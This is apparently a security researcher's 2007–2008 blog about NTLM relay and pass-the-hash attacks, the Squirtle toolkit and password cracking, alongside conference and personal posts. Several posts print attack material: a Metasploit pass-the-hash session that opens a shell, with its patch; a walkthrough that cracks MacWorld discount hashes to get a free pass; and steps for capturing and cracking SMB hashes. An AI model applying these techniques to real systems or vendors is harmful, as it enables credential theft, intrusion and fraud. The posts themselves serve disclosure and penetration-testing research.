Superimposing Nothing Nowhere

Squirtle and MS08-068

2008-11-15T13:42:00.000-08:00

HD Moore already did some great analysis on how the MS08-068 patch affected the SMB Relay attacks within Metasploit. The answer?

You can't attack the source workstation/server if MS08-068 has been applied.

This ONLY affects Squirtle if your evil agent attempts to communicate back to the victim. It should not impact attacking their IMAP, HTTP or File/Print servers.

As always the goal of Squirtle is to permit others to extend their own tools to permit the use of authentication requests from controlled browsers and at your own time or when the right users click on your evil link!

Have fun with the latest updates and thanks to Natron for pointing me towards HD's analysis.

Squirtle Updates: IMAP, Metasploit integration complete

2008-11-14T09:38:00.001-08:00

I just gave a talk to everyone here at DeepSec 08. Other than the weather being a bit cold and wet Vienna is awesome. Everyone seems happy to be at this conference and to share and network with each other. It's always fun giving the Squirtle talk to new audiences and see their eyes light up as they start to get why this attack matters to their environments or how they could use it on a client's penetration test.

With the conclusion of this talk I'm happy to announce that two new evil agent updates have been completed!

IMAP Mirroring! Download a victim's entire IMAP directory! Use social engineering, have the help desk e-mail them a new password!
Metasploit integration! SMB Relay an enterprise's server farm with Squirtle!

Get the latest updates from the Squirtle SVN at http://squirtle.googlecode.com/. The MSF update is a patch against the as-of-writing-this MSF 3.2-current SVN code. If things change I'll try to keep it updated. Not sure if this is "MSF-code worthy" as it uses the JSON ruby gem vs processing the result manually. I had the library installed, didn't want to write my own parser. :P

On Nov 11th MSRC posted some information on MS08-068 implementing some changes to the NTLM protocol to neuter the SMB Relay attack and possibly (but not mentioned) Squirtle as well. I haven't had a chance to play with yet as I didn't want to possibly spoil the live demos so close to DeepSec. It's nearly time to spend the evening at Metalab so more information as it develops (I promise!)

Big thanks to everyone here at DeepSec for coordinating this one-of-kind conference. Vienna is such a beautiful place to visit, I only wish it would be earlier in the season when it's not so cold and dreary outside. I hope to come next year for DeepSec 09!

Also, look for my ugly mug to make an appearance on Help Net Security soon. It's a brief plea on using Squirtle and hopefully my excitement over reaching more people isn't too transparent. :)

Upcoming Speaking Gigs

2008-09-02T15:24:00.000-07:00

Tying a neat little bow to my NTLM/HTTP research I'll be presenting "One XSS to Rule The Enterprise" at ToorCon X the end of September and "NTLM SSO Weaknesses" at DeepSec in November. Both talks will show off the Squirtle Attack Toolkit. Hopefully I'll have some of the updates I didn't get into the DefCon release ready by ToorCon!

When friends ask "should I go to Defcon?" I always respond "Hey, check out ToorCon. It's in a nicer climate!" Vegas in July? Pfft, San Diego in September! One of the best conventions out there, period. Just check out the conference lineup!

Passing The Dutchie @ Defcon 16

2008-08-12T15:51:00.000-07:00

Like many things with this blog, I don't prioritize it above things like hanging out with my girlfriend, going to work, sleeping, breaking my iPhone, losing all my Defcon pictures, etc.

Last weekend was Defcon 16. I had a really great time speaking to a packed house on the death of NTLM. Slides, slide video and source code to Squirtle are now available for your pleasure. I'll be doing some more work and documentation on Squirtle shortly.

A few quick changes were made to the slide deck from what was presented (and the slides on the CD are waaaaaay something different :). Mostly added NTLM Signing as a mitigation and correctly stating that JoMoKun did the Samba Pass-The-Hash modifications. Sorry!

More updates coming.

NTLM is Dead: Defcon 16

2008-08-07T08:08:00.000-07:00

Friday, August 8th @ 2pm. Come learn how to own an enterprise with one XSS!

Slides and other material will be on-line after Defcon. Source code available here

Attacking NTLM

2008-07-30T20:02:00.000-07:00

Defcon presentation times have been confirmed for a few weeks now and I've been slaving away at my slides and source code for a while now. I gave a pre-talk at work the other day and have decided to redo a lot of the slides. That's what you get when you ask for slides 38 days before the presentation. :)

Of course I'll have the full slides on-line after the conference but if you're coming to Defcon please come to my talk: Friday, August 8th at 2pm.

What exactly will I be talking about? Well, it's really difficult to describe succinctly but the best way I can say it is: An XSS inside your company == Total Domain Ownage.

Was that a scoff I just heard under your breath? Honestly, I'm not lying here. Because of the way NTLM and Windows Single Sign-On works your run-of-the-mill cross site scripting error on an internal resource can DEVASTATE your enterprise!

Stay tuned.

MS Cache and John the Ripper

2008-06-13T15:44:00.000-07:00

Chalk this one up to knowledge remembered, forgotten, and then remembered again!

Lately I have been playing with using our MPI John the Ripper cluster to increase the crack rate of MS Cache passwords. With a very long list of passwords, some of which I knew would be easy to crack, I set out and started the process on 20 nodes. After a few days and ZERO cracks I started to wonder what the hell was going on.

The answer is one I knew many years ago when cachedump first came on the scene. The MS Cache encryption routine's salt includes the lower case username as part of the salt! Because some of the cachedump tools take the username out of the registry as-is and don't convert the case you'll run JTR for days with an invalid salt. No cracks for you!

So we can do a couple of things here:

Remember this next time and manually lowercase the usernames

Tell the authors to modify the tools we use to grab the cache hashes

Patch the tools ourselves (if we have the sources) and give them to the author

Modify the cracking program to always lowercase the usernames

John The Ripper's source code is really easy to fix and the quickest to do so a simple diff against mscash_fmt.c:


--- mscash_fmt.c        2008-06-13 15:56:07.000000000 -0700
+++ mscash_fmt-lower.c  2008-06-13 15:55:49.000000000 -0700
@@ -16,6 +16,7 @@
  */
 
 #include 
+#include 
 
 #include "arch.h"
 #include "misc.h"
@@ -158,6 +159,9 @@
 
        l = strlen(ciphertext);
        strncpy(out, ciphertext + 2, l - PLAINTEXT_LENGTH + 1);
+        for(l=0; l < strlen(out); l++) {
+               out[l] = tolower(out[l]);
+       }
        return out;
 }

And now I don't have to remember this every time! JTR will remember for me and with a cluster of 20 nodes all running around 600,000 cracks a second maybe SOMETHING will crack. :)

NTLM, DefCon and Java!

2008-06-06T00:39:00.000-07:00

John Heasman just posted a rocking method of obtaining NTLM hashes out of an enterprise by turning a Java applet into a web server! Check it out!

This year I'll be presenting at DefCon on the history of NTLM attacks, how they work and why we need to get rid of it. I'll release a tool that will combine as many hacks as I can get working to use captured users and their authentication tokens. There's been a lot of talk in the past few years about browser security and it's mostly hinged around using Javascript as a port scanner, sending attacks through the browser, attacking the platforms, etc. Few have been talking about an Enterprise-class risk and since that's what I get paid to think about I'm gonna blow it open. :) Come to DefCon and have a great time!

SyScan was great, a little small but helpful to bring the confidence up speaking to people who have no clue who I am! I learned quite a bit about my speaking style which helped firm up ideas about the DefCon presentation. I presented a combination of Web Security Mistakes including how to get a free MacWorld pass and spoke more about the future of PokeHashBall.

We stayed a few extra days to soak up the culture and soak the sweat into our clothes some more since this was our first trip to Hong Kong. The MongKok Computer Center was interesting but didn't seem to really have the deals I was expecting. I didn't get to any of the other computer centers however. Maybe next trip!

We went through Narita airport on the way back so I stopped at Duty Free and bought a bottle of Suntory Whiskey, the kind Bill Murray is hawking in the movie "Lost In Translation". For relaxing times, make it Santory time. . .

They have some of the greatest commercials.

Heading to SyScan Hong Kong

2008-05-26T16:14:00.000-07:00

I've been given the opportunity to talk about Web Security at this year's SyScan conference in Hong Kong. This is my first trip to Asia so I'm really really excited about it! I haven't traveled much outside of North America -- the trip to Chaos Camp was my first oceanic flight. The Pacific Ocean is so huge that our flight from SFO will total 17 hours! It was only 9 hours to Dusseldorf!

This talk will expand on my OWASP talk on trusting the client and the MacWorld Pass hack. I'll also give a brief bit on NTLM Single Signon (NTLMSSP) attacks. Looking forward and will update at the con!

Your Client-Side Security Sucks

2008-02-22T14:54:00.001-08:00

Last night I presented at the local OWASP chapter titled "Your Client-Side Security Sucks: STOP USING IT (as your only method of security)" and the turn-out was great. I met some really awesome people and the subject matter, while not cutting-edge research, appeared to hit home.

We, as Web Application people, are still making some simple mistakes. This presentation highlighted three REAL WORLD examples of client-side security done incorrectly.

The PDF slides are available here and soon I'll have a QuickTime video with a voiceover. I LOOOOOVE Keynote now! It has such useless transformations that you must pull back or else the content will be lost. How awesome is that? Plus exporting to a QuickTime so others can enjoy your ego-boosting flame build-in!

Rumor has it there will be an OWASP regional conference in the near future so hopefully I'll present this again with some improved slides and other real world examples. If you have any examples but don't want to "go public" yourself, let me know and I'll share them. This is one of the first things you're supposed to learn as a web developer so I have no problem exposing others. JavaScript, Java and Flash do not equate to protection! Shoot me an e-mail.

The second presenter, as luck would have it, is working on a tool exactly like I had done for NTLM relay attacks! We had a good chat about where we both saw our tools going in the future. It has renewed my energy in completing the PokeHashBall tools
at least. Thanks, eric!

I Like Apple Products But I Am Not A MacHead

2008-01-24T11:33:00.000-08:00

Some have asked that because I've pick on MacWorld am I a MacHead? The answer is no, but I do like Apple products. This will be a fun movie to see as there certainly is a cult of Mac, especially here in the Bay Area.

Macheads - the movie (trailer)
Uploaded by brunogarattoni

Another Free MacWorld Platinum Pass? Yes in 2008!

2008-01-14T23:06:00.001-08:00

Last year at this time I disclosed an issue with the IDG/MacWorld Expo registration that allowed people Free Platinum Passes (valued at $1,695). I communicated this issue with IDG the week of MacWorld and they removed all the codes, fixed the site, and said thanks. Questions were asked on how to write better code and I gave them a few tips (don't trust user input, don't give your secret codes to everyone, encryption is not one-way, etc). Did they listen?

Nope.

Why Do I Do This?

Who wants to stand in line to see the Steve Jobs keynote at MacWorld? I mean have you SEEN the lines there? Really? I want to know WHATS IN THE AIR(tm)!!!

Honestly it's academic to me. I didn't even go to the keynote. :P

Getting Your Golden (Well, Blue) Ticket:

This year the cost of Platinum Passes has gone up to $1,895. That's a lot of money but you get a lot of cool things:

A free lunch every day
Free ticket to the MacWorld Blast
Seminars (MacWorld is more than just the keynote and Expo)
Priority Access Line to the Keynote

You can see why the cost. Last year the word "CREDIT" provided a 100% discount on checkout. These are called Application Logic Flaws and aren't new attacks but they can be devastating .

Like last year IDG is passing a long list of MD5 hashes to the client browser and validating them in JavaScript before sending a request to the server -- but that's really only a problem if the codes that give the discounts exist and are easily cracked. Lets see if we can get lucky this year.

Obtaining the codes -- Same as last year:

Step 1. Navigate to the main registration page
Step 2. Submit your initial data and view the source of the main registration page, search for "Priority Code"
Step 3. See the JavaScript "onchange" function? It's calling "check_password()"
Step 4. Search for "check_password()" and you'll find the list of valid codes in MD5
Step 5. Format the data for your cracker of choice and start cracking!

Cracking the codes:

I like John The Ripper for all my hash cracking needs. It's flexible, easy to use and affordable! There are two main methods used to crack passwords in John, using a wordlist or incrementing through a given keyspace. I always begin with a wordlist run just to kick out the quickies. The hash for "NONE" breaks but we already know that doesn't do anything for us.

Incremental mode is our next step but we know lower case letters aren't used so a quick look at the configuration file shows an external mode "Filter_LanMan" that throws everything to upper case. A quick run through doesn't net any cracked hashes unfortunately. There are still over 1,000 hashes to crack so we have to be a bit more intelligent in our cracking (or throw more machines, wait longer, get a PS3, etc).

A Brief Cracking Sidebar:

Incremental cracking can take a long time to perform. The size of your keyspace (k) and the maximum word length (l) determine the total number of permutations that have to be encrypted to check every instance (P). P=k^l. Take the benchmark cracks-per-second your machine takes (Cs), do the math (P/Cs) and you have the number of seconds it takes to run an Incremental.

For example lets make k = 69, l = 8 and Cs = 30 million:

((69^8)/30M) / 60 = 285,443.54 minutes (3.68 months!)

Changing l for different lengths and the time changes accordingly:

((69^7)/30M) / 60 = 4,136.86 minutes for 7 chars
((69^6)/30M) / 60 = 59.95 minutes for 6 chars

and so on. . . The time is cumulative and those are just my numbers. Some have found ways to increase the speed to 1 billion cracks-per-second. Until that code is released or we write our own, we have to work with clusters of machines to reach that. My little cluster of 9 nodes can do just about 60 million MD5's a second so a full 8 character run would take nearly 2 months to complete.

Now that you know the math and the big mountain ahead of us, how can we get on the gondola that takes you over half of it without much effort? The answer is simple, vendor codes and keyword masking!

Here Come The Free Codes:

Vendors receive a group of codes each to pass along to their customers, potential customers, friends, family, etc. These typically provide free Expo access but maybe they'll help trim down this mountain to something manageable. These free codes get passed around like candy so finding one takes a few Google searches. 08-G-PC189, 08-G-PC178, 08-G-PC260, do you see the pattern?

Time To Build An External Filter:

Now that we have a mask (08-x-y(n)) time to modify the john.conf accordingly:

[Incremental:MW]
File = $JOHN/lanman.chr
MinLen = 6
MaxLen = 6
CharCount = 69

[List.External:MW]
void filter()
{
int i, c;
i = 0;

while (c = word[i]) {
// If character is lower case, convert to upper
if (c >= 'a' && c <= 'z')
word[i] &= 0xDF;
i++;
}

// We know the static filter 08-?-?????
// Add or remove word[]s to fit the incremental length
word[9] = word[5];
word[8] = word[4];
word[7] = word[3];
word[6] = word[2];
word[5] = word[1];
word[4] = '-';
word[3] = word[0];
word[2] = '-';
word[1] = '8';
word[0] = '0';
}

With that, we run and wait...

# john -i=MW -e=MW mw2k8.codes --format=raw-MD5
Loaded 1341 password hashes with no different salts (Raw MD5 [raw-md5 SSE2])

.. but not too long because the first code looks REALLY interesting: 08-S-STAFF. Lets try it!

Download the High Quality version.

Voila. For the second year in a row, a free Platinum Pass in less than a day.

On January 7th we noticed the MD5 hashes changed in the source code. While the special code was still listed it no longer gave a 100% discount when entered. Some codes still provide a small percentage discount and a few do provide a free expo pass. We still have 14 codes left to crack so no telling if those are any good. :)

Thanks to Josh Bernstein and Garrett Gee for reminding me MacWorld was coming up and independently confirming these findings.

Maybe next year the problem will be fixed? Anyone in a betting mood? :)

IE Trust Zones

2007-11-15T07:00:00.000-08:00

This week is the joint OWASP/WASC conference in San Jose. Two days of web app nerds getting together and exchanging ideas about CSRF protections, web services, the Samy worm, etc. It's loads of fun! I'm a big OWASP supporter and push their information wherever possible. I'm always shocked when I hear "I've never heard of them" from a developer.

Rsnake gave a presentation/rant about the sorry state of web security. Not that it's something that was created out of malice, just that we're seeing issues today that were never part of the original concept of the web. Just like spam was never on the minds of Ray and Dick when they created electronic mail.

He briefly mentioned one of my favorite topics - Windows hashes. Then I read his blog entry describing Natron's ideas for using DNS Pinning to affect the IE Trust Zone. It's an area I was thinking of but hadn't worked on yet because I was focused on the insider attack space. Awesome!

Of course there are a few complications with the theory that have to be considered:

If the attacker doesn't send the domain name in the Type message that the victim's computer is a member of, a dialog box will appear. People may still put their passwords in but the idea of mass transparent authentication capture isn't there.
IE Trust Zones are pretty akward in design. What constitutes an Intranet Zone site? Microsoft KB174360 says: By default, the Local Intranet zone contains all of the network connections that were established by using a Universal Naming Convention (UNC) path, and Web sites that bypass the proxy server or have names that do not include periods (for example, http://local), provided that they are not assigned to either the Restricted Sites or Trusted Sites zone.
If a company is using a proxy server and you DNS Pin a name that doesn't have a FQDN at the end, that address may never be reached because IE won't use the defined proxy and attempt to connect directly to the attacker's IP address.

Another option I was thinking of would be somehow creating a Java or Flash proxy server but unfortunately their sandboxes have locked down any bind requests (unless someone has some mojo that gets around this). Flash doesn't support it and Java doesn't permit binds in applets.

In any event the patch to Metasploit adding NTLM type message parsing was submitted back in October. I have some updates to send in but it's still functional. The pre-defined nonce hash catcher (pokehashball.rb) script is fairly complete and the HTTP-to-POP3 tool (psyduck-pop3.rb) is fun to play with. None of these attacks have been incorporated into Metasploit modules yet but that's still on the radar (smb_relay via HTTP).

Visit http://grutz.jingojango.net/exploits/pokehashball.html for the code.

Full Disclosure: This attack was first documented by Jesse Burns at iSec Partners using jCIFS. Where's your code, Jesse? :)

Announcing BerkSec

2007-10-26T07:46:00.000-07:00

Continuing the tradition of (NY|Chi|Bay|*)Sec groupings of infosec people without a vendor bent, announcing BERKSEC 0001 - just because, why not, it's not in SF.

Come on by the Albatross Pub on Tuesday, Oct 30 at 7:30 or 8pm or later... Look for the long haired guy with a Toorcon t-shirt and join us.

NTLM Hash Update

2007-10-25T08:31:00.000-07:00

Things got a little busy/crazy around here so I'm not satisfied with what I have done so far so no code yet. This past weekend was Toorcon 1001 and it was as enjoyable as ever. I had a few breakthrough ideas thanks to the talks and side chats with everybody. That's mostly why I'm not satisfied -- always room for improvement. :)

I promise to show something soon. Really.

NTLM Hashes Like Pokemon

2007-10-12T13:29:00.000-07:00

I recently finished up a patch to Metasploit that processes NTLM Type Messages. These are the negotiated messages when authenticating to HTTP(S), IMAP, POP3 or SMTP. If you follow the svn trunk of Metasploit the support is there. Hopefully this weekend I'll finalize everything for a cool release.

VMWare Fusion Doesn't Play Nice With BPF

2007-08-24T17:03:00.001-07:00

For a while now I've been avoiding a problem with NMap and OS/X w/ VMWare Fusion installed. It's been posted about a few times on the mailing list and I always say "just shut Fusion down for it to work." Yeah, it works but it's not a real solution.

So I spent a few minutes today to figure out just WHY this is happening. Turns out my original assumption of Fusion not building "valid" interfaces is partly correct. The "vmnet[x]" interfaces can not be opened with BPF! I wrote a quick program to check it out:

macpro:~ grutz$ sudo ./testbpf vmnet8
ERROR: Device not configured

ktrace validates:

2721 testbpf CALL ioctl(0x83,0x8020426c ,0xbffffb28)
2721 testbpf RET ioctl -1 errno 6 Device not configured

So VMWare isn't creating valid interfaces. No tcpdump for you (and no nmap)! The solutions so far have been to shutdown the interfaces but what if you need to keep Fusion up and running?

Here's a quick and dirty patch applied to tcpip.cc that will skip over the vmnet interfaces. Until Fusion fixes their set up this is the only way it'll work.

/* skip broken VMWare Fusion vmnet interfaces */
#ifdef MACOSX
if (strncmp(ifr->ifr_name, "vmnet", 5) == 0)
continue;
#endif

Sigh.

Chaos Camp 2007: The beginning!

2007-08-08T03:54:00.000-07:00

Short and brief here. Surprisingly we all made it here in time to defend our freedoms and set up camp before another group could claim. Of course since we're the American Embassy here we would've taken the land anyways. We're Americans, whats yours will soon be ours!!

To be honest I'm really amazed at everything here. The people are awesome, the environment couldn't be better and the number of unique camps, activities and talks available simply can not be beat. If you're awake at 4am PST you can watch the talks live at http://events.ccc.de/camp/2007/Streams

Defcon and Chaos Camp 2007

2007-07-29T18:04:00.000-07:00

This weekend is DefCon 16. All signs say this year is going to be just as big, if not bigger, than it's been in the past. Part of me misses the Alexis Park experience. It felt more homely, more tightly knit together than at a casino. Maybe it's just me. :)

I'll also be a part of the Hackers on a Plane! We're flying right after DC to the Chaos Computer Camp. I've lamented often to friends on how disjointed we are, specifically within the Bay Area, as a community of hackers. I'm not one to talk because I'm just as bad about staying home and keeping things to myself as the rest of us. Hopefully CCC.de will help invigorate me to make some changes. This little spot on the Internet has helped a little. I no longer feel like an evil anti-social hacker -- ok, maybe a little.

Hope to see everyone there!

eEye's BinDiffing Suite for IDA Pro 5.1

2007-07-19T10:53:00.001-07:00

It's been a while since I've posted anything, mostly because I've been very busy changing jobs, starting a penetration testing group from the ground up. That plus all the initial new employee training have eaten up a lot of my time.

One thing we'll be doing is Binary Diffing. I fully believe every good penetration tester should be able to understand assembly, research new vulnerabilities and reverse engineer in some capacity. A good binary diffing program helps a LOT!

While I was waiting for our purchasing department to order Sabre's BinDiff I took a look at eEye's BinDiffingSuite. With my copy of IDA 5.1 installed I downloaded the tool and started the installation. I'm soon greeted with a message saying:

...requires requires IDA Pro Standard v5.0 or IDA Pro Advanced v5.0

During this month's eEye vulnerability forum I asked if there were any plans to update the tool to support IDA 5.1. Hackers take note - Alex's response is "We all use 5.0 here and it works well." Uh, aren't there are known vulnerabilities against IDA 5.0? Are you guys running out-dated software?!

Flame baiting aside, the MSI file is doing a very simple check for installed IDA versions. Here's how you can get it installed and running with the latest (and more secure.. ahem) version of IDA. The IDA SDK has been pretty stable since v4.9 so the suite works with v5.1 without hassle:

Open RegEdit and go to the key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IDA Pro_is1
Change the DisplayName to say "IDA Pro Standard v5.0" or "IDA Pro Professional v5.0"
Re-rerun BinDiffSuite.exe and install
Change it back to what it was previously (if you want)
Have fun!

This really is a nice suite of tools. Big kudos to eEye for releasing it and including source code!

Intel ISACA Intel ISACA Inside

2007-05-23T11:13:00.000-07:00

In today's San Francisco Chronicle, David Lazarus writes on how Intel protects its trademarked name. I found it funny in relation to my friend's little ISACA episode I posted about. While I can understand that a company has to be vigilant with ensuring somebody isn't devaluing their name or causing consumer confusion but some things are just a little too surreal.

In this case Intel is saying a woman whose business is selling houses in the VA/DC/MD area can't use the name "IntelAgent" because it would like cause confusion. Their option was to use "IntelliAgent" since the intent was to combine the words "Intelligent" and "Agent" together - IntelAgent!

Of course "IntelliAgent" works if you're from the south where extra syllables (syl-ah-buhls) are added willy-nilly. IntelliAgent (in-tell-ee-ah-gent), "I is intelliagent."

Pass The Hash Support for Metasploit

2007-05-09T00:12:00.000-07:00

Surprisingly Metasploit 3's SMB auth routines didn't support "pass the hash" so I took some time and put it in.

msf exploit(ms06_040_netapi) > set SMBPass 6A98EB0FB88A449CBE6FABFD825BCA61:A4141712F19E9DD5ADF16919BB38A95C
SMBPass => 6A98EB0FB88A449CBE6FABFD825BCA61:A4141712F19E9DD5ADF16919BB38A95C
msf exploit(ms06_040_netapi) > set SMBUser Administrator
SMBUser => Administrator
msf exploit(ms06_040_netapi) > exploit
[*] Started bind handler
[*] Doing pass the hash.
[*] LM: 6A98EB0FB88A449CBE6FABFD825BCA61
[*] NT: A4141712F19E9DD5ADF16919BB38A95C
[*] Detected a Windows 2000 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.110.130[\BROWSER] ...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.110.130[\BROWSER] ...
[*] Building the stub data...
[*] Calling the vulnerable function...
[*] Command shell session 1 opened (192.168.110.1:42485 -> 192.168.110.130:4444)

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

The Patch:

Index: lib/rex/proto/smb/client.rb
===================================================================
--- lib/rex/proto/smb/client.rb (revision 4889)
+++ lib/rex/proto/smb/client.rb (working copy)
@@ -568,8 +568,13 @@

raise XCEPT::NTLM1MissingChallenge if not self.challenge_key

- hash_lm = pass.length > 0 ? CRYPT.lanman_des(pass, self.challenge_key) : ''
- hash_nt = pass.length > 0 ? CRYPT.ntlm_md4(pass, self.challenge_key) : ''
+ if (pass.length == 65)
+ hash_lm = CRYPT.e_p24( [ pass.upcase()[0,32] ].pack('H42'), self.challenge_key)
+ hash_nt = CRPYT.e_p24( [ pass.upcase()[33,65] ].pack('H42'), self.challenge_key)
+ else
+ hash_lm = pass.length > 0 ? CRYPT.lanman_des(pass, self.challenge_key) : ''
+ hash_nt = pass.length > 0 ? CRYPT.ntlm_md4(pass, self.challenge_key) : ''
+ end

data = ''
data << hash_lm
@@ -690,7 +695,11 @@
nonce = CRYPT.md5_hash(self.challenge_key + client_challenge)

# Generate the NTLM hash
- resp_ntlm = CRYPT.ntlm_md4(pass, nonce[0, 8])
+ if (pass.length == 65)
+ resp_ntlm = CRYPT.e_p24( [ pass.upcase()[33,65] ].pack('H42'), nonce[0, 8])
+ else
+ resp_ntlm = CRYPT.ntlm_md4(pass, nonce[0, 8])
+ end

# Generate the fake LANMAN hash
resp_lmv2 = client_challenge + ("\x00" * 16)

ISACA ISACA ISACA

2007-05-08T08:11:00.000-07:00

Yesterday a friend of mine related a rather interesting tale. Like a lot of security-minded individuals he owns a domain and uses a unique username when giving out an e-mail address. Like "bugtraq@hisdomain.com" or "amazon@hisdomain.com" etc. The idea is when you receive spam for that username you can easily figure out who it was that released your e-mail address and reprimand, sue, jump up and down in a frenzy, and so on.

He recently passed the CISM exam from ISACA. He hadn't heard anything from them for a while so he calls them up. The conversation goes a little like this:

Him: Hi, I haven't received anything about my CISM. You said I passed but I don't have a certificate or anything yet.

ISACA: That's not right, let me look up your information. What's your (blah blah blah)

ISACA: Oh. I see, you're using ISACA in your e-mail address. That's trademarked and you can't do that.

Him: Really? That's really a strange policy. Make it hisname-ISACA@hisdomain.com then.

ISACA: I'm sorry, that's still in violation of the trademark.

Him: I don't beli... Fine, just remove the e-mail address entirely.

ISACA: But then we have no e-mail address and can't complete your certification.

I'm no lawyer but I believe in order to be violating a Trademark there has to be some potential or perceived confusion in the marketplace. At least that's how I read 15 U.S.C. 1125(c). If my friend's intent was to market himself as ISACA@hisdomain.com as being the real ISACA then I could see there being a clear violation that should be legally challenged.

There is a "Cyberprivacy" section of 1125(c) but that deals only with DOMAIN NAMES and not the username portion of an e-mail address. Also there's this little tidbit:

(i) has a bad faith intent to profit from that mark, including a personal name which is protected as a mark under this section;

How can ISACA really know his intent? I don't really understand the thought process that any mention of ISACA without the ® sign means the user is an infringer. Anyone?

NTLMv1, Metasploit and You

2007-04-24T20:56:00.000-07:00

In Metasploit 2.7 there existed a moduled called "smb_sniffer" that listened as a Windows SMB server, responded to negotiations with a preset challenge and forced crypto to NTLMv1. When I asked the devs about it they said it was for "future purposes."

That future purpose is now documented!

Step 1 - Download my slightly updated version from here and place it in your exploits/ directory.

Step 2a - Run it with root privs on a UNIX host (doesn't work on Windows, sorry).
Step 2b - Have a Windows machine connect to your "share" - they will get an access denied but stuff like will work.

Step 3 - Send the hashes to Cain & Abel for cracking or cryptanalysis! Obtain the HALFLMCHALL tables from FreeRainbowCrack.Com or run a brute force, dictionary, hybrid, etc.

Step 4 - Success!

One caveat -- the half-lm challenge table only does the first 7 characters of LANMAN. You still have to brute force the last 7 and if the user's password is greater than 14 characters, you're really out of luck.

Enjoy! :)

Frameworks are not auto-hackers

2007-04-13T11:31:00.000-07:00

I was reading a review of the Yoggie Gatekeeper Pro in this month's SC Magazine. It's a neat little device that hides your PC behind a Linux firewall-appliance when connecting to an untrusted network. The voodoo of how it shims itself into your Windows networking stack so you can connect to a wireless network and still be protected through the Yoggie aside -- one thing about the review really made my hair bristle:

Using our vulnerability assessment tool (NetClarity) and our penetration tool (Core Impact) we were unable to compromisethe Gatekeeper or the computer behind it.
- SC Magazine, April 2007, Pg 63

Well duh.

Both the tools listed are only as strong as their signatures, exploits and platform shellcode. That statement is like running Core Impact against a copy of OpenVMS and saying IMPENETRABLE! when you're done. Technically it's valid but it's no measure of strength.

Maybe these statements are made because of a contractual obligation. "Say our product name five times and we'll give you free copies" sort of thing. Unfortunately there will be InfoSec managers and the like who will listen and wonder if maybe they should use these tools in lieu of hiring security professionals who actually know something.

Maybe I'm just being too overly critical and hypersensitive about this. I don't think I am as I've looked at a number of Web Application Security tools on the market and none of them have been able to find the more serious vulnerabilities vs. a team of two or three highly skilled testers have. We still need good QA but attack Frameworks like CORE Impact, Canvas and Metasploit aren't automated tools. Don't treat them as such.